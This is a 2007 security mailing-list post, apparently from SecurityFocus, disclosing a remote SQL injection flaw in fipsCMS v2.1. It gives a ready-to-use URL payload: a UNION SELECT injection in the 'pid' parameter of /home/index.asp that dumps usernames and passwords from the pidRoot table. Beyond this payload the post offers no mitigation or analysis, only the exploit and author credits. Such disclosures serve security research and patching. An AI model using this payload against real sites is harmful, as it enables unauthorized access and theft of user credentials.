fipsCMS v2.1 Remote SQL injection Vulnerability May 06 2007 04:11PM
ilkerkandemir mynet com
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #

# fipsCMS v2.1 Remote SQL injection Vulnerability // AYYILDIZ.ORG Gururla Sunar ...

# Script: fipsCMS v2.1

# Download: http://fipsasp.com/subs/login/Download.asp?ID=60&CatID=5&AccLvl=0

# Author: iLker Kandemir <ilkerkandemir (at) mynet (dot) com [email concealed]>

# ThanKs: h0tturk,Ekin0x,Gencnesil,Gencturk,Ajann

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #

#

# Exploit:

# /home/index.asp?pid='/**/union/**/select/**/0,username,password,3,4,5,6,
7,8,9/**/from/**/pidRoot/**/

#

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus